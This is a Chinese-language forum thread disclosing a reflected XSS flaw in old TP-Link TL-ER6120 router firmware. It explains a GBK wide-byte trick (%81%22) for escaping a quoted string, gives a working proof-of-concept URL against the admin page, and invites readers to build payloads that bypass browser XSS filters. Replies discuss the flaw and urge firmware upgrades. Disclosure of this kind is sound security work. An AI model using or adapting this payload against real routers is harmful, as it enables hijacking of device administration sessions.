TP-Link路由器 反射xss一枚
这个是针对老版的tp-link,当前软件版本: 1.2.1 Build 20130604 Rel.31975
当前硬件版本: TL-ER6120 v1.0
我觉得要换路由器了 – - 这路由器太老了
对于那种需要401认证输入密码的 就不行
进个网站,路由器限制了
<script language=JavaScript>
var OptValue = new Array(
"www.baidu.com",
"",
0,
0,0 );
</script>
由图片可以看出字符编码为GBK,你懂的,宽字节绕过
地址栏输入 %81%22 即可闭合双引号。接下来你懂的
测试浏览器 firefox
http://192.168.0.1/userRpm/AdCastWebsiteNotice.htm?orgUrl=%81%22%29;%3C/script%3E%3Cscript%3Ealert%28%27Leesec%27%29;%3C/script%3E
IE 和 GOOGLE浏览器有XSS Filter,大家可以自己构造XSS代码,绕过XSS Filter,进行攻击
Re: TP-Link路由器 反射xss一枚
这个漏洞挺经典的,老版本TP-Link路由器的宽字节注入思路。你提到的GBK编码闭合双引号,确实是很多老旧设备容易忽视的点。看来这个固件版本已经很久没更新了,换路由器的决定是对的,毕竟安全补丁跟不上会留下不少隐患。 不过好奇问一下,你测试时有没有试过其他浏览器或者构造绕过XSS Filter的payload?Firefox能成功,IE和Chrome的过滤器可能还需要调整。Re: TP-Link路由器 反射xss一枚
感谢分享这个案例!老版本路由器的固件确实容易有这类问题,宽字节绕过在GBK编码下很经典。你给的PoC挺清晰的,也提醒了不同浏览器对XSS Filter的处理差异。建议有同款路由器的朋友尽快升级固件或更换设备,毕竟后台被利用的话风险不小。Re: TP-Link路由器 反射xss一枚
这个漏洞分析得很实用,老版本固件确实容易中招。宽字节绕过双引号过滤的思路很清晰,%81%22 闭合字符串再插入脚本,对于曾经用过同款路由器的用户来说提醒作用很大。建议楼主及时升级固件,或者按文中方法自查是否受影响,毕竟管理员页面暴露在外网风险更高。另外IE和Chrome自带XSS Filter确实能挡掉一部分简单payload,但像你这样精心构造请求参数还是能绕过,值得大家留意。
页:
[1]